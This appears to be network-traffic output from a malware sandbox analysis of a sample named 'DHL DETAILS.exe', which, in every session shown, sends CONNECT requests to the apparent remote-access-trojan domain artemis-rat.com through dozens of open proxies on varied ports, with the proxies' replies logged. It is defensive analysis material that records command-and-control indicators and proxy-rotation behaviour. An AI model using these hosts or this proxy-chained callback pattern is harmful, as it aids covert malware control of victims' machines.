Mar 9, 2024 13:14:14.511521101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
551	192.168.2.5	51219	72.195.101.99	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.512712002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
552	192.168.2.5	51603	146.196.40.146	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.521262884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.663285017 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
553	192.168.2.5	51630	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.531537056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
554	192.168.2.5	51502	117.160.250.163	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.531702042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.290098906 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:15 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
555	192.168.2.5	51638	51.210.223.9	3000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.545613050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
556	192.168.2.5	51703	23.152.40.14	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.548211098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
557	192.168.2.5	50671	8.213.128.90	6666	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.549530029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.859827995 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
558	192.168.2.5	51155	45.11.95.166	6010	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.555102110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567692995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.601697922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
559	192.168.2.5	51742	172.67.231.3	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.555108070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.709481955 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
560	192.168.2.5	51635	39.105.27.30	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.558789015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.072036982 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
561	192.168.2.5	51639	47.243.205.1	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.567019939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.900784969 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
562	192.168.2.5	51292	154.12.253.232	57447	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.569318056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567693949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.601702929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
563	192.168.2.5	51644	185.158.114.14	25697	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.569343090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
564	192.168.2.5	51632	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.571589947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
565	192.168.2.5	51663	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.572094917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
566	192.168.2.5	51259	72.206.181.105	64935	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.573458910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
567	192.168.2.5	51621	183.215.23.242	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.576627016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.989536047 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
568	192.168.2.5	51758	45.14.174.148	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.577852011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.732079029 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
569	192.168.2.5	51655	193.239.58.92	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.579408884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
570	192.168.2.5	51762	104.16.230.163	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.581738949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.736872911 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
571	192.168.2.5	51771	104.16.105.207	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.584280014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.738730907 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
572	192.168.2.5	51660	45.138.87.238	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.586133957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
573	192.168.2.5	51666	185.49.30.5	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.587697029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
574	192.168.2.5	51231	45.124.113.6	9500	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.590761900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.782793045 CET	536	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
575	192.168.2.5	51657	128.199.251.219	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.593297005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.942869902 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
576	192.168.2.5	51659	159.223.71.71	61818	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.593641043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.301825047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536448956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.724040985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
577	192.168.2.5	51664	104.248.158.78	61725	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.597069979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.286251068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.334062099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536550045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
578	192.168.2.5	51750	107.181.168.145	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.629820108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
579	192.168.2.5	51645	49.4.48.128	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.629825115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
580	192.168.2.5	51658	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.630172014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
581	192.168.2.5	51205	189.240.60.164	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.630188942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.723942995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.167239904 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
